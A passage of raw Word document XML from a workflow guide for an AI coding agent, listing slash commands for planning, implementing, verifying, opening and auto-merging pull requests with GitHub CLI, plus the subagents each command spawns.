                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Read </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>backlog.md</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>, filter by current lane, pick top Active item, move to In flight.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/plan-task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Spawn the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> subagent. Output MUST include acceptance criteria and security implications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/implement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Run the plan; delegate to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@backend-builder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@ios-builder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>; commit after each green test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/verify-acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mandatory gate before </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/open-pr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>. See §8.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/simplify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Three parallel review agents (reuse, quality, efficiency). Auto-fix Priority-1 findings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/open-pr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>gh pr create --body-file</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> using the structured PR template. See §9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/await-ci</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Poll </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>gh pr checks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Green → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/auto-merge</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Red → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/diagnose-ci</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/diagnose-ci</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Pull failed-job logs, identify the failure, fix, push, re-await. Max 3 retries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/auto-merge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>gh pr merge --auto --squash --delete-branch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>. Only fires if security checkboxes are ticked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/daily-digest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Walk audit log + git log + Linear since cursor; write digest; post to Linear.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/monitor-tick</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Read PR status + Sentry + AWS dev CloudWatch. Append to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>alerts.md</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> only on state changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7. Subagents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Workers spawned per job. Putting heavy work in subagents keeps the driver's context window clean — each subagent gets a fresh window per task.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Subagent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Spawned by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (built-in)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/plan-task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Architectural design + acceptance criteria.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@backend-builder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/implement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (backend)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FastAPI modules per CLAUDE.md patterns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@ios-builder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/implement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (iOS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SwiftUI; runs xcodebuild verification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@test-writer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>After every builder run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
